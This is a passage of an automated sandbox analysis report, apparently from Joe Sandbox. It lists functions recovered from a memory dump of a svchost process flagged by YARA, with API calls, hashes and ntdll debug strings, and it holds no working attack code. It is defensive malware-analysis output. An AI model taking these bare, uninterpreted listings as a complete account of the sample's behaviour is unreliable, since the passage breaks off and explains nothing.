                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: a8cad730c8e8491c74a59e3d83856ab4159a792325c3858f070e70d02cf43fb0
                                                                                                                      • Instruction ID: 7e3a3db86805c7569ced5ba99b0d937e72dadcb6a3974a0f9305304ebb17c6e9
                                                                                                                      • Opcode Fuzzy Hash: a8cad730c8e8491c74a59e3d83856ab4159a792325c3858f070e70d02cf43fb0
                                                                                                                      • Instruction Fuzzy Hash: B211D372D00148BFEB11ABA49C81DEFBBBCDF456A4F108658FA04A7241D6748E069BA5
                                                                                                                      Function 02673DB9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 02673E3A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: 8dad0990813af319a3e4799d3ecc1b6ede4039f383837b583046bbdbdf7931a3
                                                                                                                      • Instruction ID: dbeb91e64b46243d0c93b943ef7c9e051b52c1c55a23b34c1251d986f434dc4d
                                                                                                                      • Opcode Fuzzy Hash: 8dad0990813af319a3e4799d3ecc1b6ede4039f383837b583046bbdbdf7931a3
                                                                                                                      • Instruction Fuzzy Hash: C111C272D0015CBAEF11AAA09C80DEFBB7CDF456A4F048169FA14A7250D6695E068BA1
                                                                                                                      Function 02673DC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(661035W,00000111,00000000,00000000), ref: 02673E3A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 661035W$661035W
                                                                                                                      • API String ID: 1836367815-4108853117
                                                                                                                      • Opcode ID: b3b1b6927297dcfd834a62e9f8998550f807ff2c8694129253e898656db0a1de
                                                                                                                      • Instruction ID: f314041dad9a6daaeeed0d05d9ae4dc8c62fdab40a32648cf1ffe1451f5b57b3
                                                                                                                      • Opcode Fuzzy Hash: b3b1b6927297dcfd834a62e9f8998550f807ff2c8694129253e898656db0a1de
                                                                                                                      • Instruction Fuzzy Hash: 5301D672D0024C7BEF11AAE49C81DEFBB7CDF41694F008159FA0467240E6744E068BB6
                                                                                                                      Function 0268C753 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 228 268c753-268c794 call 2664853 call 268d653 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,0267E36B,?,?,00000000,?,0267E36B,?,?,?), ref: 0268C78F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 91abb7d82ffbb300c834860f9915abda1e087af3534362ab768425a334786e76
                                                                                                                      • Instruction ID: d0f4a92fa9596b248aabcc53fdf6efdf0856254220774a901575dd69f2ed6ce8
                                                                                                                      • Opcode Fuzzy Hash: 91abb7d82ffbb300c834860f9915abda1e087af3534362ab768425a334786e76
                                                                                                                      • Instruction Fuzzy Hash: 79E06D722042087BD614EF58DC50E9B33ADEFC8710F00441DFA18A7241C670B910CAB8
                                                                                                                      Function 0268C7A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 233 268c7a3-268c7e4 call 2664853 call 268d653 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,E8560001,00000007,00000000,00000004,00000000,02676E0D,000000F4), ref: 0268C7DF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: 78ea8d3e74bb12d0c99bfe25a8a4523d6cf168d0823e9178060a443b9b02b838
                                                                                                                      • Instruction ID: ae29b6437ebe60d2a9b9320d6e6a3e7bdbd5176ebe8fa251dfe65128fab3a382
                                                                                                                      • Opcode Fuzzy Hash: 78ea8d3e74bb12d0c99bfe25a8a4523d6cf168d0823e9178060a443b9b02b838
                                                                                                                      • Instruction Fuzzy Hash: 21E06D712042087BC614EE68DC40F9B73ADEFC8710F00441DFA19A7241D670BD10CAB9
                                                                                                                      Function 0268C7F3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 243 268c7f3-268c82c call 2664853 call 268d653 ExitProcess
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,434B7343,?,?,434B7343), ref: 0268C827
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: 1916a9ed2d4c45a39d0907bc97947f13a3aee05ca4497b7e2032c46200373c9a
                                                                                                                      • Instruction ID: 64be3c9352755afb8b3689b0e6d9d6274c482fd77e433490f3458646fdd87dfe
                                                                                                                      • Opcode Fuzzy Hash: 1916a9ed2d4c45a39d0907bc97947f13a3aee05ca4497b7e2032c46200373c9a
                                                                                                                      • Instruction Fuzzy Hash: 06E04F312002447BD120AA59DC01F9B776DDBC5720F008419FA1DA7241C671B911C7B4
                                                                                                                      Function 03072C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 248 3072c0a-3072c0f 249 3072c11-3072c18 248->249 250 3072c1f-3072c26 LdrInitializeThunk 248->250
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: e3b92376376056dd122cbe8410babdc9309be898e7d0726aea8d35adae4963fb
                                                                                                                      • Instruction ID: 978ff8379b2714e3c8432404cb067043a0d8e278491b8802dcd243ad10882349
                                                                                                                      • Opcode Fuzzy Hash: e3b92376376056dd122cbe8410babdc9309be898e7d0726aea8d35adae4963fb
                                                                                                                      • Instruction Fuzzy Hash: 3BB09B71D035C9C5EA51F7604608717794967D0701F59C461D3430645F4739C1D1E175

                                                                                                                      Non-executed Functions

                                                                                                                      Function 030B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      • Opcode ID: cd6b9eb5fd196b5e77b98da1cf61243c988cff8c3996d502c08cf245b1ba75f8
                                                                                                                      • Instruction ID: 7e1d42b5e95240b4ace52c6fae4b4ef91a56037da577e7bd1ad378f691ac07df
                                                                                                                      • Opcode Fuzzy Hash: cd6b9eb5fd196b5e77b98da1cf61243c988cff8c3996d502c08cf245b1ba75f8
                                                                                                                      • Instruction Fuzzy Hash: 9292587560A341ABD725DE24C880BABB7FCBB88750F184D2DFA94DB250D770E844CB96
                                                                                                                      Function 030268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-3089669407
                                                                                                                      • Opcode ID: 34c5a25b0bbf6b468097c9c37da5149b99e15559becc3df426445d9f74965ebb
                                                                                                                      • Instruction ID: d2857abe527f878acbbc7b7c683fbf7aaa860539f6aec1f8d2c2444dac64bfc9
                                                                                                                      • Opcode Fuzzy Hash: 34c5a25b0bbf6b468097c9c37da5149b99e15559becc3df426445d9f74965ebb
                                                                                                                      • Instruction Fuzzy Hash: CC8101B6D032187F9B16FB98DDC4EEEB7BEAB58610B044421B910FB114E721ED548BB0
                                                                                                                      Function 03068620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • corrupted critical section, xrefs: 030A54C2
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A54CE
                                                                                                                      • double initialized or corrupted critical section, xrefs: 030A5508
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A540A, 030A5496, 030A5519
                                                                                                                      • Critical section address, xrefs: 030A5425, 030A54BC, 030A5534
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 030A5543
                                                                                                                      • Thread identifier, xrefs: 030A553A
                                                                                                                      • 8, xrefs: 030A52E3
                                                                                                                      • Critical section address., xrefs: 030A5502
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 030A54B6
                                                                                                                      • Critical section debug info address, xrefs: 030A541F, 030A552E
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 030A54E2
                                                                                                                      • Address of the debug info found in the active list., xrefs: 030A54AE, 030A54FA
                                                                                                                      • undeleted critical section in freed memory, xrefs: 030A542B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      • Opcode ID: 2fe396a9bda189fd5cee1ade8ca23bbe4ac13c327e0c3928ef2f177c06abb9b4
                                                                                                                      • Instruction ID: 05a912d8470b3a1d0d4ebad9db8dd29e82ab4c33e1cc9876ddf294650a63ccbc
                                                                                                                      • Opcode Fuzzy Hash: 2fe396a9bda189fd5cee1ade8ca23bbe4ac13c327e0c3928ef2f177c06abb9b4
                                                                                                                      • Instruction Fuzzy Hash: 87819CB1A02758AFDB20CF98DC40BAEBBF9FB49704F148159F558BB641D3B1A940CB64
                                                                                                                      Function 03060F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                      • API String ID: 0-360209818
                                                                                                                      • Opcode ID: 865ae5aa7a9d7064c5307bc09d5ab823507ca28146658e773f5f9eebfb7fdf09
                                                                                                                      • Instruction ID: 07c188140329b1d834052b7aabf5d9ac8a2b799eab74b8400ea794f80bc635d3
                                                                                                                      • Opcode Fuzzy Hash: 865ae5aa7a9d7064c5307bc09d5ab823507ca28146658e773f5f9eebfb7fdf09
                                                                                                                      • Instruction Fuzzy Hash: 5462C0B5E026298FDB68CF58D8407ADB7F6BF85310F1882DAD449AB240D7725AE1CF40
                                                                                                                      Function 030E12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                      • API String ID: 0-3591852110
                                                                                                                      • Opcode ID: 5378d35edcc610b719b2d0ead884de4fd886fb07ebe7b5ff8d5fb4bce4023cac
                                                                                                                      • Instruction ID: 8ecbc226705e39d5a9a3d32a58087f5e247ca1b15f774d5cd9841f258c36e171
                                                                                                                      • Opcode Fuzzy Hash: 5378d35edcc610b719b2d0ead884de4fd886fb07ebe7b5ff8d5fb4bce4023cac
                                                                                                                      • Instruction Fuzzy Hash: A512BC75706642DFD729CF28C441BBAFBF5EF49704F188899E4968BA81D738E880CB50
                                                                                                                      Function 0304AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-3197712848
                                                                                                                      • Opcode ID: a031a1aacf3f37d82b70bba428fb486d0b9bb6b9b28afc10b8007b60c615d21d
                                                                                                                      • Instruction ID: 9de5049347c7334c8c93c82ec89aeb01680b31bda20392c43fd2d424abacbda1
                                                                                                                      • Opcode Fuzzy Hash: a031a1aacf3f37d82b70bba428fb486d0b9bb6b9b28afc10b8007b60c615d21d
                                                                                                                      • Instruction Fuzzy Hash: 4012FFB1A0A3419FD764DF28C440BAEB3E4FFC5704F08496AF9858B291E734DA44CB92
                                                                                                                      Function 0302D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                      • API String ID: 0-3532704233
                                                                                                                      • Opcode ID: d9cdaef6c8b41055ee5582c37bb1e741f218b928fccf42199f0a308bd3f5cdf3
                                                                                                                      • Instruction ID: be7b45f7d030e641e8e246dcf08494377f416c01585208560dec6cced681689e
                                                                                                                      • Opcode Fuzzy Hash: d9cdaef6c8b41055ee5582c37bb1e741f218b928fccf42199f0a308bd3f5cdf3
                                                                                                                      • Instruction Fuzzy Hash: 02B1AD7190A3619FC761EF24C480AAFBBE8AF88754F054D2EF899DB240D770DD448B92
                                                                                                                      Function 030E0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                      • API String ID: 0-1357697941
                                                                                                                      • Opcode ID: ebc7e0432f95f0a44720f6c17b46a81c16b8842db9155c83d85f4cc66a70892f
                                                                                                                      • Instruction ID: c13b29938e4f45e27828205e5afa29e8410bf6de1dd4daf85b36a18e26911157
                                                                                                                      • Opcode Fuzzy Hash: ebc7e0432f95f0a44720f6c17b46a81c16b8842db9155c83d85f4cc66a70892f
                                                                                                                      • Instruction Fuzzy Hash: 9FF11335B06256EFCB25CF6AC440BEAFBF5FF0A300F088459E4959B692C7B4A945CB50
                                                                                                                      Function 030C9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                      • API String ID: 0-3063724069
                                                                                                                      • Opcode ID: 13f01cd4069fab49287ed2cd382df961e0044e8ce47aafd86940c262176e31b4
                                                                                                                      • Instruction ID: de18be8177d52b8ed8fe643531c5fd871afc683f55c0e962587bee952fdc10e5
                                                                                                                      • Opcode Fuzzy Hash: 13f01cd4069fab49287ed2cd382df961e0044e8ce47aafd86940c262176e31b4
                                                                                                                      • Instruction Fuzzy Hash: 78D1E2B281A395AFD721DB64C840BAFB7ECAFC4B14F04496DFA849B190D770C9448B96
                                                                                                                      Function 030E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                      • API String ID: 0-1700792311
                                                                                                                      • Opcode ID: 5a13918bb50c1e8a7f1ee014ad4143285e5002209b6812b8cd388a847f1ecbcd
                                                                                                                      • Instruction ID: 1d6f1c9ac44930d382db9cf99906d1c3ba7680d707ed3285bb73d10c2ff1022d
                                                                                                                      • Opcode Fuzzy Hash: 5a13918bb50c1e8a7f1ee014ad4143285e5002209b6812b8cd388a847f1ecbcd
                                                                                                                      • Instruction Fuzzy Hash: 96D1E075602785EFCB26DF6AC440AAEFBF1FF8A710F088049E4559F652CBB49981CB14
                                                                                                                      Function 0302D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0302D2AF
                                                                                                                      • @, xrefs: 0302D313
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0302D2C3
                                                                                                                      • @, xrefs: 0302D0FD
                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0302D146
                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0302D0CF
                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0302D262
                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0302D196
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                      • API String ID: 0-1356375266
                                                                                                                      • Opcode ID: 6aff9b4abd1d1003bf1dc71a9cde4d1bfcb5bb1d37bf9b9b78ea00a75a20f250
                                                                                                                      • Instruction ID: c354da6637cd1d6ea3ee940d7365e6af31db531559f7974c7ac1e1343b975327
                                                                                                                      • Opcode Fuzzy Hash: 6aff9b4abd1d1003bf1dc71a9cde4d1bfcb5bb1d37bf9b9b78ea00a75a20f250
                                                                                                                      • Instruction Fuzzy Hash: F9A19B7190A3559FD360DF24C884B9FBBE8BB84715F004D2EEA989A240D774D908CF92
                                                                                                                      Function 03049EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 030976EE
                                                                                                                      • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03097709
                                                                                                                      • Internal error check failed, xrefs: 03097718, 030978A9
                                                                                                                      • sxsisol_SearchActCtxForDllName, xrefs: 030976DD
                                                                                                                      • minkernel\ntdll\sxsisol.cpp, xrefs: 03097713, 030978A4
                                                                                                                      • @, xrefs: 03049EE7
                                                                                                                      • Status != STATUS_NOT_FOUND, xrefs: 0309789A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                      • API String ID: 0-761764676
                                                                                                                      • Opcode ID: c9470fa040eb049fb2370748e1db2e0e66d8a6707d3a4b49c4e6bd3508fd95fe
                                                                                                                      • Instruction ID: 981be90a95646b624a9960969d7e2134808e3b26f75c8198aa4a549f56b0dacd
                                                                                                                      • Opcode Fuzzy Hash: c9470fa040eb049fb2370748e1db2e0e66d8a6707d3a4b49c4e6bd3508fd95fe
                                                                                                                      • Instruction Fuzzy Hash: 05129D75A01215DFDF24CFA8C881AEEB7F4FF48710F1984AAE849EB241E7359941CB64
                                                                                                                      Function 0303EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                      • API String ID: 0-1109411897
                                                                                                                      • Opcode ID: 3b0d1fd1f07704ca0680317037a7a52f775ad8f7bc0ac9c9ce187ffbc492510e
                                                                                                                      • Instruction ID: 41655ef2425c71216ceda401aff4aa6502c6b9781f1216471d7a82f17601b9f9
                                                                                                                      • Opcode Fuzzy Hash: 3b0d1fd1f07704ca0680317037a7a52f775ad8f7bc0ac9c9ce187ffbc492510e
                                                                                                                      • Instruction Fuzzy Hash: 03A21975E0662A8FDF64DF19CC987ADB7B9AF46304F1442EAD809A7250DB349E85CF00
                                                                                                                      Function 0302F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
